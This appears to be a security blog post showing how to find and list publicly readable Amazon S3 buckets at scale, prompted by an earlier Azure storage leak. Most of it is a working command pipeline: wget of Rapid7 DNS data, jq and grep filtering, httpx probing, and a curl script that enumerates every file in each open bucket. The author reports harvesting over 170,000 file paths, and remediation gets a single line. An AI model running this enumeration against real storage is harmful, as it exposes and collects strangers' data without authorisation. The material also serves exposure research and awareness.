Public Amazon S3 Buckets and the risk of data leakage

We’ve seen the recent CityBee leak from Lithuania (the report is on this site). The main cause of this strategy is a misconfiguration of the Azure Blob Storage, allowing public unauthenticated access leading to the leakage of over 110,000 users’ information.

So I was thinking, what if we could replicate this with Amazon S3 Buckets? And heck yeah it worked.

So just like the steps shown on Behind the scenes of CityBee customer data leak I will generate a list of domain names that belong to Amazon S3 Buckets.

1. Download the CNAME database from Rapid7 Open Data FDNS

wget https://opendata.rapid7.com/sonar.fdns_v2/2021-01-29-1611878713-fdns_cname.json.gz
gunzip 2021-01-29-1611878713-fdns_cname.json.gz

2. Cleaning up the data

jq -r '.value' 2021-01-29-1611878713-fdns_cname.json > cname.txt
sort -u cname.txt -o cname.txt
grep '\.s3\.' cname.txt > aws.txt

At this point we should have a list of domain names that belong to AWS S3 Buckets.

3. Verifying that you can access the data.

Now unlike the case with Azure Blob Storage, there’s no need to brute force the directory or append GET parameters. At this point it’s just checking if the domain still exists and allow access or not. I will accomplish this with the help of Project Discovery’s httpx

httpx -l aws.txt -mc 200 -no-color -o aws_result.txt

4. Listing files in the AWS S3 Buckets

To do this I went for the lazy route and asked the POSIX wizard - Stnby to create a script that’d do it for me and this is what he came up with

# get_aws_keys.sh
curl -s "$1" | yq-xq -r '.ListBucketResult.Contents[].Key' | xargs -L 1 printf '%s/%s\n' "$1"

This script will list all the files from the supplied AWS S3 Bucket URL. And to use this with our list, we simply need to run:

cat aws_result.txt | xargs -L 1 ./get_aws_keys.sh > files.txt

The resulting txt file will contain all of the public accessible files from all of the AWS S3 Buckets. At the time of writing this post, I managed to generate a list of over 170,000 files. Just think about it, all of this data is publicly available, now image the amount of damage that this could’ve cause if someone decided that it’ll be a great idea to put sensitive data on there or even worse, a database?

5. Remediation

Block access to private informations or don’t store them on these storage services in the first place if it’s not necessary.

Well, that’s all I’ve got for you today, and we’ll meet again in the next post. Stay safe and wear a mask.